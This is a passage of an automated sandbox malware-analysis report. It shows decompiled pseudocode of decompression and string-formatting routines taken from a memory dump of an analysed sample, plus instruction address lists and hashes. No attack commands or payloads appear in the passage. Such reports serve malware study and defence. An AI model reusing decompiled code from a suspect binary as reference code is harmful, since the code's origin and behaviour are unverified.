								goto L15;
							}
							_t187 = E00A0A9EE(_t184) >> 0x0000000c & 0x000000ff;
							E00A0A9D7(_t184, 4);
							__eflags = _t187;
							if(_t187 != 0) {
								_t188 = _t187 + 2;
								__eflags = _t188;
								while(1) {
									_t188 = _t188 - 1;
									__eflags = _t137 - 0x14;
									if(_t137 >= 0x14) {
										break;
									}
									 *(_t201 + _t137 + 0x14) = 0;
									_t137 = _t137 + 1;
									__eflags = _t188;
									if(_t188 != 0) {
										continue;
									}
									break;
								}
								_t137 = _t137 - 1;
								goto L15;
							}
							 *(_t201 + _t137 + 0x14) = 0xf;
							L15:
							_t137 = _t137 + 1;
							__eflags = _t137 - 0x14;
						} while (_t137 < 0x14);
						_push(0x14);
						_t189 = _t185 + 0x3c50;
						_push(_t189);
						_push(_t201 + 0x1c);
						E00A132D2();
						_t138 = 0;
						__eflags = 0;
						do {
							__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84)) - 5;
							if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84)) - 5) {
								L19:
								_t93 = E00A0A9F3(_t184);
								_t94 =  *(_t189 + 0x84);
								_t180 = _t93 & 0x0000fffe;
								__eflags = _t180 -  *((intOrPtr*)(_t189 + 4 + _t94 * 4));
								if(_t180 >=  *((intOrPtr*)(_t189 + 4 + _t94 * 4))) {
									_t148 = 0xf;
									_t95 = _t94 + 1;
									 *(_t201 + 0x10) = _t148;
									__eflags = _t95 - _t148;
									if(_t95 >= _t148) {
										L27:
										_t150 =  *(_t184 + 4) +  *(_t201 + 0x10);
										 *_t184 =  *_t184 + (_t150 >> 3);
										_t98 =  *(_t201 + 0x10);
										 *(_t184 + 4) = _t150 & 0x00000007;
										_t152 = 0x10;
										_t155 =  *((intOrPtr*)(_t189 + 0x44 + _t98 * 4)) + (_t180 -  *((intOrPtr*)(_t189 + _t98 * 4)) >> _t152 - _t98);
										__eflags = _t155 -  *_t189;
										asm("sbb eax, eax");
										_t99 = _t98 & _t155;
										__eflags = _t99;
										_t156 =  *(_t189 + 0xc88 + _t99 * 2) & 0x0000ffff;
										L28:
										__eflags = _t156 - 0x10;
										if(_t156 >= 0x10) {
											__eflags = _t156 - 0x12;
											if(__eflags >= 0) {
												_t157 = _t184;
												if(__eflags != 0) {
													_t192 = (E00A0A9EE(_t157) >> 9) + 0xb;
													__eflags = _t192;
													_push(7);
												} else {
													_t192 = (E00A0A9EE(_t157) >> 0xd) + 3;
													_push(3);
												}
												E00A0A9D7(_t184);
												while(1) {
													_t192 = _t192 - 1;
													__eflags = _t138 - 0x194;
													if(_t138 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t138 + 0x28) = 0;
													_t138 = _t138 + 1;
													__eflags = _t192;
													if(_t192 != 0) {
														continue;
													}
													L44:
													_t189 = _t185 + 0x3c50;
													goto L45;
												}
												break;
											}
											__eflags = _t156 - 0x10;
											_t166 = _t184;
											if(_t156 != 0x10) {
												_t198 = (E00A0A9EE(_t166) >> 9) + 0xb;
												__eflags = _t198;
												_push(7);
											} else {
												_t198 = (E00A0A9EE(_t166) >> 0xd) + 3;
												_push(3);
											}
											E00A0A9D7(_t184);
											__eflags = _t138;
											if(_t138 == 0) {
												L47:
												_t116 = 0;
												L49:
												return _t116;
											} else {
												while(1) {
													_t198 = _t198 - 1;
													__eflags = _t138 - 0x194;
													if(_t138 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t201 + _t138 + 0x27));
													_t138 = _t138 + 1;
													__eflags = _t198;
													if(_t198 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t138 + _t185 + 0xe4c8)) + _t156 & 0x0000000f;
										_t138 = _t138 + 1;
										goto L45;
									}
									_t169 = 4 + _t95 * 4 + _t189;
									__eflags = _t169;
									while(1) {
										__eflags = _t180 -  *_t169;
										if(_t180 <  *_t169) {
											break;
										}
										_t95 = _t95 + 1;
										_t169 = _t169 + 4;
										__eflags = _t95 - 0xf;
										if(_t95 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t201 + 0x10) = _t95;
									goto L27;
								}
								_t170 = 0x10;
								_t183 = _t180 >> _t170 - _t94;
								_t173 = ( *(_t183 + _t189 + 0x88) & 0x000000ff) +  *(_t184 + 4);
								 *_t184 =  *_t184 + (_t173 >> 3);
								 *(_t184 + 4) = _t173 & 0x00000007;
								_t156 =  *(_t189 + 0x488 + _t183 * 2) & 0x0000ffff;
								goto L28;
							}
							_t127 = E00A149AD(_t185);
							__eflags = _t127;
							if(_t127 == 0) {
								goto L47;
							}
							goto L19;
							L45:
							__eflags = _t138 - 0x194;
						} while (_t138 < 0x194);
						L46:
						 *((char*)(_t185 + 0xe661)) = 1;
						__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84));
						if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84))) {
							_push(0x12b);
							_push(_t185 + 0xa0);
							_push(_t201 + 0x30);
							E00A132D2();
							_push(0x3c);
							_push(_t185 + 0xf8c);
							_push(_t201 + 0x15b);
							E00A132D2();
							_push(0x11);
							_push(_t185 + 0x1e78);
							_push(_t201 + 0x197);
							E00A132D2();
							_push(0x1c);
							_push(_t185 + 0x2d64);
							_push(_t201 + 0x1a8);
							E00A132D2();
							E00A1F750(_t185 + 0xe4c8, _t201 + 0x2c, 0x194);
							_t116 = 1;
							goto L49;
						}
						goto L47;
					}
					 *((intOrPtr*)(_t185 + 0xe65c)) = 1;
					_push(_t185 + 0xe4c4);
					_push(_t185);
					return E00A12AA7(_t178, _t205);
				}
				_t135 = E00A149AD(__ecx);
				if(_t135 != 0) {
					goto L2;
				}
				return _t135;
			}





































                                                        0x00a13c7d
                                                        0x00a13c84
                                                        0x00a13c8d
                                                        0x00a13c95
                                                        0x00a13ca4
                                                        0x00a13caf
                                                        0x00a13cb6
                                                        0x00a13cbb
                                                        0x00a13cc0
                                                        0x00a13ce5
                                                        0x00a13ce7
                                                        0x00a13ced
                                                        0x00a13cf3
                                                        0x00a13cf9
                                                        0x00a13cfe
                                                        0x00a13d0d
                                                        0x00a13d12
                                                        0x00a13d12
                                                        0x00a13d19
                                                        0x00a13d1f
                                                        0x00a13d30
                                                        0x00a13d34
                                                        0x00a13d39
                                                        0x00a13d3d
                                                        0x00a13d40
                                                        0x00a13d79
                                                        0x00000000
                                                        0x00a13d79
                                                        0x00a13d50
                                                        0x00a13d53
                                                        0x00a13d58
                                                        0x00a13d5a
                                                        0x00a13d63
                                                        0x00a13d63
                                                        0x00a13d66
                                                        0x00a13d66
                                                        0x00a13d67
                                                        0x00a13d6a
                                                        0x00000000
                                                        0x00000000
                                                        0x00a13d6c
                                                        0x00a13d71
                                                        0x00a13d72
                                                        0x00a13d74
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a13d74
                                                        0x00a13d76
                                                        0x00000000
                                                        0x00a13d76
                                                        0x00a13d5c
                                                        0x00a13d7d
                                                        0x00a13d7d
                                                        0x00a13d7e
                                                        0x00a13d7e
                                                        0x00a13d83
                                                        0x00a13d85
                                                        0x00a13d8d
                                                        0x00a13d92
                                                        0x00a13d93
                                                        0x00a13d98
                                                        0x00a13d98
                                                        0x00a13d9a
                                                        0x00a13da3
                                                        0x00a13da5
                                                        0x00a13db6
                                                        0x00a13db8
                                                        0x00a13dbf
                                                        0x00a13dc5
                                                        0x00a13dcb
                                                        0x00a13dcf
                                                        0x00a13dfc
                                                        0x00a13dfd
                                                        0x00a13dfe
                                                        0x00a13e02
                                                        0x00a13e04
                                                        0x00a13e22
                                                        0x00a13e25
                                                        0x00a13e31
                                                        0x00a13e33
                                                        0x00a13e37
                                                        0x00a13e3c
                                                        0x00a13e49
                                                        0x00a13e4b
                                                        0x00a13e4e
                                                        0x00a13e50
                                                        0x00a13e50
                                                        0x00a13e52
                                                        0x00a13e5a
                                                        0x00a13e5a
                                                        0x00a13e5d
                                                        0x00a13e74
                                                        0x00a13e77
                                                        0x00a13ec3
                                                        0x00a13ec5
                                                        0x00a13ee2
                                                        0x00a13ee2
                                                        0x00a13ee5
                                                        0x00a13ec7
                                                        0x00a13ed1
                                                        0x00a13ed4
                                                        0x00a13ed4
                                                        0x00a13ee9
                                                        0x00a13eee
                                                        0x00a13eee
                                                        0x00a13eef
                                                        0x00a13ef5
                                                        0x00000000
                                                        0x00000000
                                                        0x00a13ef7
                                                        0x00a13efc
                                                        0x00a13efd
                                                        0x00a13eff
                                                        0x00000000
                                                        0x00000000
                                                        0x00a13f01
                                                        0x00a13f01
                                                        0x00000000
                                                        0x00a13f01
                                                        0x00000000
                                                        0x00a13eee
                                                        0x00a13e79
                                                        0x00a13e7c
                                                        0x00a13e7e
                                                        0x00a13e9b
                                                        0x00a13e9b
                                                        0x00a13e9e
                                                        0x00a13e80
                                                        0x00a13e8a
                                                        0x00a13e8d
                                                        0x00a13e8d
                                                        0x00a13ea2
                                                        0x00a13ea7
                                                        0x00a13ea9
                                                        0x00a13f24
                                                        0x00a13f24
                                                        0x00a13fa3
                                                        0x00000000
                                                        0x00a13eab
                                                        0x00a13eab
                                                        0x00a13eab
                                                        0x00a13eac
                                                        0x00a13eb2
                                                        0x00000000
                                                        0x00000000
                                                        0x00a13eb8
                                                        0x00a13ebc
                                                        0x00a13ebd
                                                        0x00a13ebf
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a13ec1
                                                        0x00000000
                                                        0x00a13eab
                                                        0x00a13ea9
                                                        0x00a13e6a
                                                        0x00a13e6e
                                                        0x00000000
                                                        0x00a13e6e
                                                        0x00a13e0d
                                                        0x00a13e0d
                                                        0x00a13e0f
                                                        0x00a13e0f
                                                        0x00a13e11
                                                        0x00000000
                                                        0x00000000
                                                        0x00a13e13
                                                        0x00a13e14
                                                        0x00a13e17
                                                        0x00a13e1a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a13e1c
                                                        0x00a13e1e
                                                        0x00000000
                                                        0x00a13e1e
                                                        0x00a13dd3
                                                        0x00a13dd6
                                                        0x00a13de0
                                                        0x00a13de8
                                                        0x00a13ded
                                                        0x00a13df0
                                                        0x00000000
                                                        0x00a13df0
                                                        0x00a13da9
                                                        0x00a13dae
                                                        0x00a13db0
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a13f07
                                                        0x00a13f07
                                                        0x00a13f07
                                                        0x00a13f13
                                                        0x00a13f15
                                                        0x00a13f1c
                                                        0x00a13f22
                                                        0x00a13f28
                                                        0x00a13f35
                                                        0x00a13f3a
                                                        0x00a13f3b
                                                        0x00a13f40
                                                        0x00a13f4a
                                                        0x00a13f52
                                                        0x00a13f53
                                                        0x00a13f58
                                                        0x00a13f62
                                                        0x00a13f6a
                                                        0x00a13f6b
                                                        0x00a13f70
                                                        0x00a13f7a
                                                        0x00a13f82
                                                        0x00a13f83
                                                        0x00a13f99
                                                        0x00a13fa1
                                                        0x00000000
                                                        0x00a13fa1
                                                        0x00000000
                                                        0x00a13f22
                                                        0x00a13cc8
                                                        0x00a13cd2
                                                        0x00a13cd3
                                                        0x00000000
                                                        0x00a13cda
                                                        0x00a13c97
                                                        0x00a13c9e
                                                        0x00000000
                                                        0x00000000
                                                        0x00a13fad

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2c3de862736fa759ab1a4f332156b41f12bf147e2cfccb8d80ac070fbe34d2d0
                                                        • Instruction ID: 32f6989fd0e731e6279c18d0388e1702b286937fd63ebff55c840b8eccbd15fd
                                                        • Opcode Fuzzy Hash: 2c3de862736fa759ab1a4f332156b41f12bf147e2cfccb8d80ac070fbe34d2d0
                                                        • Instruction Fuzzy Hash: 7A9157722043499BDF24EF68E991BFEB7D5AB50300F10092DE697872C2EB749A85C752
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A24C39 Relevance: .2, Instructions: 237COMMONLIBRARYCODECrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 83%
                                                        			E00A24C39(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed char _t60;
				signed char _t62;
				signed int _t64;
				void* _t65;
				signed int _t66;
				signed char _t75;
				signed char _t78;
				void* _t86;
				void* _t88;
				signed char _t90;
				signed char _t92;
				signed int _t93;
				signed int _t96;
				signed int _t98;
				signed int _t99;
				signed int _t103;
				signed int* _t104;
				void* _t106;
				signed int _t112;
				unsigned int _t114;
				signed char _t116;
				void* _t124;
				unsigned int _t125;
				void* _t126;
				signed int _t127;
				short _t128;
				void* _t131;
				void* _t133;
				void* _t135;
				signed int _t136;
				void* _t137;
				void* _t139;
				void* _t140;

				_t126 = __edi;
				_t52 =  *0xa3e668; // 0xcba178b4
				_v8 = _t52 ^ _t136;
				_t135 = __ecx;
				_t103 = 0;
				_t124 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t106 = 0x58;
				_t139 = _t54 - 0x64;
				if(_t139 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E00A2566B(_t135);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t135 + 0x30)) - _t103;
								if( *((intOrPtr*)(_t135 + 0x30)) != _t103) {
									L71:
									L72:
									return E00A1EEFA(_v8 ^ _t136);
								}
								_t125 =  *(_t135 + 0x20);
								_push(_t126);
								_v16 = _t103;
								_t60 = _t125 >> 4;
								_v12 = _t103;
								_t127 = 0x20;
								__eflags = 1 & _t60;
								if((1 & _t60) == 0) {
									L46:
									_t112 =  *(_t135 + 0x32) & 0x0000ffff;
									__eflags = _t112 - 0x78;
									if(_t112 == 0x78) {
										L48:
										_t62 = _t125 >> 5;
										__eflags = _t62 & 0x00000001;
										if((_t62 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t112 - 0x61;
											if(_t112 == 0x61) {
												L54:
												_t64 = 1;
												L55:
												_t128 = 0x30;
												__eflags = _t64;
												if(_t64 != 0) {
													L57:
													_t65 = 0x58;
													 *((short*)(_t136 + _t103 * 2 - 0xc)) = _t128;
													__eflags = _t112 - _t65;
													if(_t112 == _t65) {
														L60:
														_t66 = 1;
														L61:
														__eflags = _t66;
														asm("cbw");
														 *((short*)(_t136 + _t103 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t103 = _t103 + 2;
														__eflags = _t103;
														L62:
														_t131 =  *((intOrPtr*)(_t135 + 0x24)) -  *((intOrPtr*)(_t135 + 0x38)) - _t103;
														__eflags = _t125 & 0x0000000c;
														if((_t125 & 0x0000000c) == 0) {
															E00A23F00(_t135 + 0x448, 0x20, _t131, _t135 + 0x18);
															_t137 = _t137 + 0x10;
														}
														E00A25986(_t135 + 0x448,  &_v16, _t103, _t135 + 0x18,  *((intOrPtr*)(_t135 + 0xc)));
														_t114 =  *(_t135 + 0x20);
														_t104 = _t135 + 0x18;
														_t75 = _t114 >> 3;
														__eflags = _t75 & 0x00000001;
														if((_t75 & 0x00000001) != 0) {
															_t116 = _t114 >> 2;
															__eflags = _t116 & 0x00000001;
															if((_t116 & 0x00000001) == 0) {
																E00A23F00(_t135 + 0x448, 0x30, _t131, _t104);
																_t137 = _t137 + 0x10;
															}
														}
														E00A25868(_t135, 0);
														__eflags =  *_t104;
														if( *_t104 >= 0) {
															_t78 =  *(_t135 + 0x20) >> 2;
															__eflags = _t78 & 0x00000001;
															if((_t78 & 0x00000001) != 0) {
																E00A23F00(_t135 + 0x448, 0x20, _t131, _t104);
															}
														}
														goto L71;
													}
													_t86 = 0x41;
													__eflags = _t112 - _t86;
													if(_t112 == _t86) {
														goto L60;
													}
													_t66 = 0;
													goto L61;
												}
												__eflags = _t64;
												if(_t64 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t133 = 0x41;
											__eflags = _t112 - _t133;
											if(_t112 == _t133) {
												goto L54;
											}
											_t64 = 0;
											goto L55;
										}
										goto L51;
									}
									_t88 = 0x58;
									__eflags = _t112 - _t88;
									if(_t112 != _t88) {
										goto L50;
									}
									goto L48;
								}
								_t90 = _t125 >> 6;
								__eflags = 1 & _t90;
								if((1 & _t90) == 0) {
									__eflags = 1 & _t125;
									if((1 & _t125) == 0) {
										_t92 = _t125 >> 1;
										__eflags = 1 & _t92;
										if((1 & _t92) == 0) {
											goto L46;
										}
										_v16 = _t127;
										L45:
										_t103 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t93);
									_v16 = _t93;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							goto L72;
						}
						_t96 = _t55;
						__eflags = _t96;
						if(__eflags == 0) {
							L28:
							_push(_t103);
							_push(0xa);
							L29:
							_t56 = E00A25403(_t135, _t126, __eflags);
							goto L10;
						}
						__eflags = _t96 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E00A255E0(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E00A25169(_t103, _t135);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t135 + 0x20;
						 *_t3 =  *(_t135 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E00A2554D(__ecx, _t124);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E00A255C1(__ecx);
					goto L10;
				}
				if(_t139 == 0) {
					goto L27;
				}
				_t140 = _t54 - _t106;
				if(_t140 > 0) {
					_t98 = _t54 - 0x5a;
					__eflags = _t98;
					if(_t98 == 0) {
						_t56 = E00A24FAC(__ecx);
						goto L10;
					}
					_t99 = _t98 - 7;
					__eflags = _t99;
					if(_t99 == 0) {
						goto L30;
					}
					__eflags = _t99;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E00A2536B(_t135, __eflags, _t103);
					goto L10;
				}
				if(_t140 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t124) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}











































                                                        0x00a24c39
                                                        0x00a24c41
                                                        0x00a24c48
                                                        0x00a24c4d
                                                        0x00a24c4f
                                                        0x00a24c53
                                                        0x00a24c56
                                                        0x00a24c5a
                                                        0x00a24c5b
                                                        0x00a24c5e
                                                        0x00a24ccb
                                                        0x00a24cce
                                                        0x00a24d1d
                                                        0x00a24d1d
                                                        0x00a24d20
                                                        0x00a24c8c
                                                        0x00a24c8e
                                                        0x00a24c93
                                                        0x00a24c95
                                                        0x00a24d3b
                                                        0x00a24d3e
                                                        0x00a24e84
                                                        0x00a24e86
                                                        0x00a24e95
                                                        0x00a24e95
                                                        0x00a24d44
                                                        0x00a24d49
                                                        0x00a24d4c
                                                        0x00a24d4f
                                                        0x00a24d53
                                                        0x00a24d59
                                                        0x00a24d5a
                                                        0x00a24d5c
                                                        0x00a24d86
                                                        0x00a24d86
                                                        0x00a24d8a
                                                        0x00a24d8d
                                                        0x00a24d97
                                                        0x00a24d99
                                                        0x00a24d9c
                                                        0x00a24d9e
                                                        0x00a24da4
                                                        0x00a24da4
                                                        0x00a24da6
                                                        0x00a24da6
                                                        0x00a24da9
                                                        0x00a24db7
                                                        0x00a24db7
                                                        0x00a24db9
                                                        0x00a24dbb
                                                        0x00a24dbc
                                                        0x00a24dbe
                                                        0x00a24dc4
                                                        0x00a24dc6
                                                        0x00a24dc7
                                                        0x00a24dcc
                                                        0x00a24dcf
                                                        0x00a24ddd
                                                        0x00a24ddd
                                                        0x00a24ddf
                                                        0x00a24ddf
                                                        0x00a24dea
                                                        0x00a24dec
                                                        0x00a24df1
                                                        0x00a24df1
                                                        0x00a24df4
                                                        0x00a24dfa
                                                        0x00a24dfc
                                                        0x00a24dff
                                                        0x00a24e0f
                                                        0x00a24e14
                                                        0x00a24e14
                                                        0x00a24e29
                                                        0x00a24e2e
                                                        0x00a24e31
                                                        0x00a24e36
                                                        0x00a24e39
                                                        0x00a24e3b
                                                        0x00a24e3d
                                                        0x00a24e40
                                                        0x00a24e43
                                                        0x00a24e50
                                                        0x00a24e55
                                                        0x00a24e55
                                                        0x00a24e43
                                                        0x00a24e5c
                                                        0x00a24e61
                                                        0x00a24e64
                                                        0x00a24e69
                                                        0x00a24e6c
                                                        0x00a24e6e
                                                        0x00a24e7b
                                                        0x00a24e80
                                                        0x00a24e6e
                                                        0x00000000
                                                        0x00a24e83
                                                        0x00a24dd3
                                                        0x00a24dd4
                                                        0x00a24dd7
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24dd9
                                                        0x00000000
                                                        0x00a24dd9
                                                        0x00a24dc0
                                                        0x00a24dc2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24dc2
                                                        0x00a24dad
                                                        0x00a24dae
                                                        0x00a24db1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24db3
                                                        0x00000000
                                                        0x00a24db3
                                                        0x00000000
                                                        0x00a24da0
                                                        0x00a24d91
                                                        0x00a24d92
                                                        0x00a24d95
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24d95
                                                        0x00a24d60
                                                        0x00a24d63
                                                        0x00a24d65
                                                        0x00a24d70
                                                        0x00a24d72
                                                        0x00a24d7a
                                                        0x00a24d7c
                                                        0x00a24d7e
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24d80
                                                        0x00a24d84
                                                        0x00a24d84
                                                        0x00000000
                                                        0x00a24d84
                                                        0x00a24d74
                                                        0x00a24d69
                                                        0x00a24d69
                                                        0x00a24d6a
                                                        0x00000000
                                                        0x00a24d6a
                                                        0x00a24d67
                                                        0x00000000
                                                        0x00a24d67
                                                        0x00a24c9b
                                                        0x00000000
                                                        0x00a24c9b
                                                        0x00a24d27
                                                        0x00a24d27
                                                        0x00a24d2a
                                                        0x00a24cfc
                                                        0x00a24cfc
                                                        0x00a24cfd
                                                        0x00a24cff
                                                        0x00a24d01
                                                        0x00000000
                                                        0x00a24d01
                                                        0x00a24d2c
                                                        0x00a24d2f
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24d35
                                                        0x00a24ca4
                                                        0x00a24ca4
                                                        0x00000000
                                                        0x00a24ca4
                                                        0x00a24cd0
                                                        0x00a24d13
                                                        0x00000000
                                                        0x00a24d13
                                                        0x00a24cd2
                                                        0x00a24cd5
                                                        0x00a24d08
                                                        0x00a24d0a
                                                        0x00000000
                                                        0x00a24d0a
                                                        0x00a24cd7
                                                        0x00a24cda
                                                        0x00a24cf8
                                                        0x00a24cf8
                                                        0x00a24cf8
                                                        0x00a24cf8
                                                        0x00000000
                                                        0x00a24cf8
                                                        0x00a24cdc
                                                        0x00a24cdf
                                                        0x00a24cf1
                                                        0x00000000
                                                        0x00a24cf1
                                                        0x00a24ce1
                                                        0x00a24ce4
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24ce8
                                                        0x00000000
                                                        0x00a24ce8
                                                        0x00a24c60
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24c66
                                                        0x00a24c68
                                                        0x00a24ca8
                                                        0x00a24ca8
                                                        0x00a24cab
                                                        0x00a24cc4
                                                        0x00000000
                                                        0x00a24cc4
                                                        0x00a24cad
                                                        0x00a24cad
                                                        0x00a24cb0
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24cb3
                                                        0x00a24cb6
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24cb8
                                                        0x00a24cbb
                                                        0x00000000
                                                        0x00a24cbb
                                                        0x00a24c6a
                                                        0x00a24ca2
                                                        0x00000000
                                                        0x00a24ca2
                                                        0x00a24c6e
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24c77
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24c7c
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24c81
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24c8a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 38b20ce7c4aad4145788045ef783e5a5c28c7ea0815c6b1d5a427c4a2b6eb847
                                                        • Instruction ID: 5db4b02f8c3c214cea5a3d603f4bb8c0e1b9a591957b0df130c51540185ce33a
                                                        • Opcode Fuzzy Hash: 38b20ce7c4aad4145788045ef783e5a5c28c7ea0815c6b1d5a427c4a2b6eb847
                                                        • Instruction Fuzzy Hash: AE618871600B39A7DF389B2CBA91BBE23A9EF4D704F14093AE843DF291D651ED428355
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A13FAE Relevance: .2, Instructions: 232COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 72%
                                                        			E00A13FAE(void* __ecx) {
				signed int _t71;
				signed int _t72;
				signed int _t73;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				signed int _t90;
				signed int _t94;
				signed int _t109;
				intOrPtr* _t111;
				signed int _t114;
				intOrPtr _t115;
				signed int _t121;
				signed int _t124;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t135;
				signed int _t138;
				intOrPtr* _t139;
				intOrPtr* _t150;
				void* _t151;
				signed int _t154;
				unsigned int _t159;
				signed int _t162;
				signed int _t164;
				signed int _t165;
				intOrPtr* _t168;
				void* _t170;
				void* _t171;

				_t170 = __ecx;
				if( *((char*)( *((intOrPtr*)(_t171 + 8)) + 0x11)) != 0) {
					_t168 =  *((intOrPtr*)(_t171 + 0x1d8));
					__eflags =  *((char*)(_t168 + 8));
					if( *((char*)(_t168 + 8)) != 0) {
						L5:
						_t164 = 0;
						__eflags = 0;
						do {
							_t109 = E00A0A9EE(_t168) >> 0x0000000c & 0x000000ff;
							E00A0A9D7(_t168, 4);
							__eflags = _t109 - 0xf;
							if(_t109 != 0xf) {
								 *(_t171 + _t164 + 0x18) = _t109;
								goto L14;
							}
							_t124 = E00A0A9EE(_t168) >> 0x0000000c & 0x000000ff;
							E00A0A9D7(_t168, 4);
							__eflags = _t124;
							if(_t124 != 0) {
								_t125 = _t124 + 2;
								__eflags = _t125;
								while(1) {
									_t125 = _t125 - 1;
									__eflags = _t164 - 0x14;
									if(_t164 >= 0x14) {
										break;
									}
									 *(_t171 + _t164 + 0x18) = 0;
									_t164 = _t164 + 1;
									__eflags = _t125;
									if(_t125 != 0) {
										continue;
									}
									break;
								}
								_t164 = _t164 - 1;
								goto L14;
							}
							 *(_t171 + _t164 + 0x18) = 0xf;
							L14:
							_t164 = _t164 + 1;
							__eflags = _t164 - 0x14;
						} while (_t164 < 0x14);
						_push(0x14);
						_t111 =  *((intOrPtr*)(_t171 + 0x1e8)) + 0x3bb0;
						_push(_t111);
						_push(_t171 + 0x18);
						 *((intOrPtr*)(_t171 + 0x20)) = _t111;
						E00A132D2();
						_t165 = 0;
						__eflags = 0;
						do {
							__eflags =  *((char*)(_t168 + 8));
							if( *((char*)(_t168 + 8)) != 0) {
								L19:
								_t71 = E00A0A9F3(_t168);
								_t72 =  *(_t111 + 0x84);
								_t159 = _t71 & 0x0000fffe;
								__eflags = _t159 -  *((intOrPtr*)(_t111 + 4 + _t72 * 4));
